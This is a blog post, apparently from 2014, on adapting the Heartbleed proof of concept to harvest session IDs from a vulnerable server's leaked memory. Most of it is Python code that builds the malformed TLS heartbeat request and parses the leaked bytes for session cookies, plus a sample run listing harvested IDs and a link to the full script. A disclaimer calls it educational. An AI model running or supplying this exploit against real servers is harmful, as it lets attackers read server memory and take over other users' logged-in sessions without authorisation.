Using Heartbleed PoC for Hijacking User Sessions En Masse

Edit: Many people have commented on the fact that this would very likely land you in prison if you were to use it on unauthorized servers. This and any other exploit code you use on servers that you do not own is very much against the law. This code is for educational purposes only, and I take no responsibility for you doing something stupid with it.

If you have been living under a rock recently: Heartbleed (CVE-2014-0160) is a bug in OpenSSL's TLS heartbeat extension that lets anyone on the internet read up to 64 KB of a vulnerable server's process memory per request, with no authentication and no trace in the server's logs.

Matthew Sullivan posted a blog post earlier today about using CVE-2014-0160 to hijack user sessions from vulnerable servers. I altered the proof of concept code written by Jared Stafford to continuously query a given server for memory chunks and parse those chunks for session IDs.

Some very simple checks are in place so that each session ID is only printed once. You can check out Sullivan's blog post to see how these session IDs can be inserted into a web browser to steal those users' sessions.
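The two halves of that technique, as an added example that is not the altered script from the gist or Jared Stafford's original PoC: building the malformed heartbeat record that makes a vulnerable OpenSSL leak memory, pulling the leaked bytes out of the heartbeat response, and scanning them for a named cookie while reporting each value only once. The `fetch_record` callable, the `SessionHarvester` class and the sample memory chunks are assumptions for the example; the real script does the TLS handshake and the send/receive over a socket itself.

```python
import re
import struct

# Added example; not the script from the post. The record layouts follow the
# TLS record format and the heartbeat extension (RFC 6520).
HEARTBEAT_CONTENT_TYPE = 0x18   # TLS record content type for heartbeat messages
HB_REQUEST, HB_RESPONSE = 1, 2  # heartbeat message types


def build_heartbeat_request(tls_version=(3, 2), claimed_length=0x4000) -> bytes:
    """Malformed heartbeat request: claims a 16 KiB payload but carries none.

    A patched OpenSSL discards it because the claimed length exceeds the
    record; an unpatched one copies `claimed_length` bytes of process memory
    into its response. The default reproduces the public PoC's record
    18 03 02 00 03 01 40 00.
    """
    body = struct.pack("!BH", HB_REQUEST, claimed_length)
    major, minor = tls_version
    return struct.pack("!BBBH", HEARTBEAT_CONTENT_TYPE, major, minor, len(body)) + body


def leaked_bytes_from_record(record: bytes) -> bytes:
    """Return the leaked payload of a heartbeat response record, else b''."""
    if len(record) < 8 or record[0] != HEARTBEAT_CONTENT_TYPE:
        return b""
    (rec_len,) = struct.unpack("!H", record[3:5])
    body = record[5:5 + rec_len]
    if len(body) < 3 or body[0] != HB_RESPONSE:
        return b""
    return body[3:]  # everything after the 3-byte heartbeat header is leaked memory


def extract_session_ids(chunk: bytes, cookie_name: str, min_length: int = 8) -> list:
    """Find `cookie_name=<value>` occurrences in a chunk of leaked memory.

    Memory is arbitrary bytes, so it is decoded as latin-1 (which never fails).
    The lookbehind keeps `csrf_session=` from matching `session=`; a value that
    runs into the end of the chunk may be cut off by the leak window and is
    skipped rather than reported as a bogus session ID; very short values are
    treated as noise.
    """
    text = chunk.decode("latin-1")
    pattern = re.compile(r"(?<![\w-])" + re.escape(cookie_name) + r"=([A-Za-z0-9_\-.%]+)",
                         re.ASCII)
    found = []
    for m in pattern.finditer(text):
        if m.end() == len(text):
            continue  # possibly truncated at the chunk boundary
        value = m.group(1)
        if len(value) >= min_length:
            found.append(value)
    return found


class SessionHarvester:
    """Hypothetical helper: reports each session ID only the first time it is seen."""

    def __init__(self, cookie_name: str):
        self.cookie_name = cookie_name
        self.seen = set()

    def process_chunk(self, chunk: bytes) -> list:
        new = []
        for sid in extract_session_ids(chunk, self.cookie_name):
            if sid not in self.seen:
                self.seen.add(sid)
                new.append(sid)
        return new


def harvest(fetch_record, cookie_name: str, max_queries: int) -> list:
    """The query loop with the network call injected.

    `fetch_record(request_bytes)` is an assumed callable that sends the
    heartbeat request to an already-negotiated TLS connection and returns the
    raw record the server answered with.
    """
    harvester = SessionHarvester(cookie_name)
    request = build_heartbeat_request()
    collected = []
    for _ in range(max_queries):
        record = fetch_record(request)
        collected.extend(harvester.process_chunk(leaked_bytes_from_record(record)))
    return collected


# Constructed sample of what leaked memory can look like: fragments of other
# clients' HTTP requests interleaved with binary junk. Not real captured data.
SAMPLE_CHUNKS = [
    b"\x00\x17\x03GET /account HTTP/1.1\r\nHost: your_server.com\r\n"
    b"Cookie: session=1395650268; lang=en\r\n\x00\x00\xff",
    b"\xde\xad session=1552654927\r\nAccept: */*\r\n\x00session=1395650268; session=42\x7f\x00",
    b"Cookie: csrf_session=9999999999; session=9074328142; session=1552654927;"
    b"\x00\x00session=17479254",
]


def sample_records() -> list:
    """Wrap each sample chunk in a heartbeat response record, as a server would."""
    records = []
    for chunk in SAMPLE_CHUNKS:
        body = struct.pack("!BH", HB_RESPONSE, len(chunk)) + chunk
        records.append(struct.pack("!BBBH", HEARTBEAT_CONTENT_TYPE, 3, 2, len(body)) + body)
    return records


def demo() -> list:
    """Run the loop against the constructed records instead of a live server."""
    records = iter(sample_records())
    return harvest(lambda _req: next(records), "session", len(SAMPLE_CHUNKS))


if __name__ == "__main__":
    for sid in demo():
        print("session=" + sid)
```

Running `demo()` prints three IDs: the duplicate in the second and third chunks is dropped by the harvester, `csrf_session=` is not mistaken for `session=`, the two-character value is treated as noise, and the value cut off at the end of the third chunk is not reported. The loop is deliberately fed from a closure so the parsing can be exercised without a vulnerable host; sending the request to a server you do not own is exactly what the note at the top of the post warns about.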

Example output (the second argument is the name of the cookie to look for):

➜ ~ ./heartbleed-altered.py your_server.com session

session=1395650268  
session=1552654927  
session=9074328142  
session=1584630615  
session=1399867484  
session=1570915943  
session=6442471150  
session=1134475661  
session=1828846521  
session=1025417958  
session=1429746458  
session=9503698952  
session=3413620908  
session=5569288762  
session=3669059145  
session=1624974555  
session=1070329834  
session=1747925477  
session=1129670396  
session=1017137517  
session=2331559646  

Altered Script is available at https://gist.github.com/mpdavis/10171593